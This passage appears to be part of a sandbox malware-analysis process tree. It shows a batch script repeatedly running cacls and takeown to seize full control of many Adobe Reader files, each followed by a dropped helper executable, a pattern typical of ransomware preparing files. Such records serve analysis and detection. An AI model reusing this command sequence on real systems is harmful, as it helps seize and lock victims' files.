    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "brt32.clx" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "brt32.clx" -nobanner
      4⤵
      Executes dropped EXE
      PID:660
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  - Loads dropped DLL
  PID:1364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:1148
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "usa.fca" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1948
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "usa.fca" -nobanner
      4⤵
      Executes dropped EXE
      PID:2040
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1676
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  - Loads dropped DLL
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    PID:1368
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  - Loads dropped DLL
  PID:772
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    - Modifies file permissions
    PID:1900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    - Loads dropped DLL
    PID:844
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      Executes dropped EXE
      PID:1912
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  - Loads dropped DLL
  PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "pmd.cer" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1732
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "pmd.cer" -nobanner
      4⤵
      Executes dropped EXE
      PID:1888
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2032
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif""
  2⤵
  - Loads dropped DLL
  PID:1948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif" /E /G Admin:F /C
    3⤵
    PID:1364
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif"
    3⤵
    - Modifies file permissions
    PID:432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "email_initiator.gif" -nobanner
    3⤵
    - Loads dropped DLL
    PID:1332
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "email_initiator.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1108
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:1368
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:1664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:1072
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "pdf.gif" -nobanner
      4⤵
      Executes dropped EXE
      PID:1100
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""
  2⤵
  PID:1900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C
    3⤵
    PID:1692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"
    3⤵
    - Modifies file permissions
    PID:1276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "server_issue.gif" -nobanner
    3⤵
    PID:772
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "server_issue.gif" -nobanner
      4⤵
      PID:1524
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:940
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1092
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:804
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf""
  2⤵
  PID:432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf" /E /G Admin:F /C
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf"
    3⤵
    - Modifies file permissions
    PID:1064
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:1984
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:1664
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1100
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:1128
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:360
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:328
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1700
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:604
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:1580
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1720
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:1100
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:1332
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:1700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1888
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    - Modifies file permissions
    PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:1580
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1164
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:1744
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    PID:584
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:744
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:1496
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""
  2⤵
  PID:872
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"
    3⤵
    - Modifies file permissions
    PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "ended_review_or_form.gif" -nobanner
    3⤵
    PID:1720
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "ended_review_or_form.gif" -nobanner
      4⤵
      PID:1576
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:900
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif" /E /G Admin:F /C
    3⤵
    PID:1580
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviewers.gif"
    3⤵
    - Modifies file permissions
    PID:1092
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "reviewers.gif" -nobanner
    3⤵
    PID:1164
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "reviewers.gif" -nobanner
      4⤵
      PID:1368
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif""
  2⤵
  PID:1388
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_lg.gif"
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "server_lg.gif" -nobanner
    3⤵
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "server_lg.gif" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:336
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif""
  2⤵
  PID:1808
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInTray.gif"
    3⤵
    - Modifies file permissions
    PID:2032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
    3⤵
    PID:900
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "turnOnNotificationInTray.gif" -nobanner
      4⤵
      PID:432
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:716
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf""
  2⤵
  PID:1092
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf" /E /G Admin:F /C
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf"
    3⤵
    - Modifies file permissions
    PID:604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "MinionPro-Bold.otf" -nobanner
    3⤵
    PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "MinionPro-Bold.otf" -nobanner
      4⤵
      PID:1972
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:744
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe""
  2⤵
  PID:1072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe" /E /G Admin:F /C
    3⤵
    PID:660
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\LogTransport2.exe"
    3⤵
    - Modifies file permissions
    PID:1156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "LogTransport2.exe" -nobanner
    3⤵
    PID:1388
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "LogTransport2.exe" -nobanner
      4⤵
      PID:1752
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1720
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm""
  2⤵
  PID:1100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm"
    3⤵
    PID:1912
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "zy______.pfm" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "zy______.pfm" -nobanner
      4⤵
      PID:1368
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca""
  2⤵
  PID:1480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca" /E /G Admin:F /C
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca"
    3⤵
    PID:648
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "brt.fca" -nobanner
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "brt.fca" -nobanner
      4⤵
      PID:1588
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:660
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""
  2⤵
  PID:1732
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"
    3⤵
    PID:940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "eng.hyp" -nobanner
    3⤵
    PID:1108
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "eng.hyp" -nobanner
      4⤵
      PID:1756
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1484
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt""
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt" /E /G Admin:F /C
    3⤵
    PID:844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt"
    3⤵
    - Modifies file permissions
    PID:1696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "zdingbat.txt" -nobanner
    3⤵
    PID:752
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "zdingbat.txt" -nobanner
      4⤵
      PID:604
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:872
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT""
  2⤵
  PID:900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT" /E /G Admin:F /C
    3⤵
    PID:1092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\TURKISH.TXT"
    3⤵
    PID:336
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ITjElT8m.exe -accepteula "TURKISH.TXT" -nobanner
    3⤵
    PID:1700
  - - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
      ITjElT8m.exe -accepteula "TURKISH.TXT" -nobanner
      4⤵
      PID:1156
- - C:\Users\Admin\AppData\Local\Temp\ITjElT8m.exe
    ITjElT8m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\LD49hz1C.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:1888
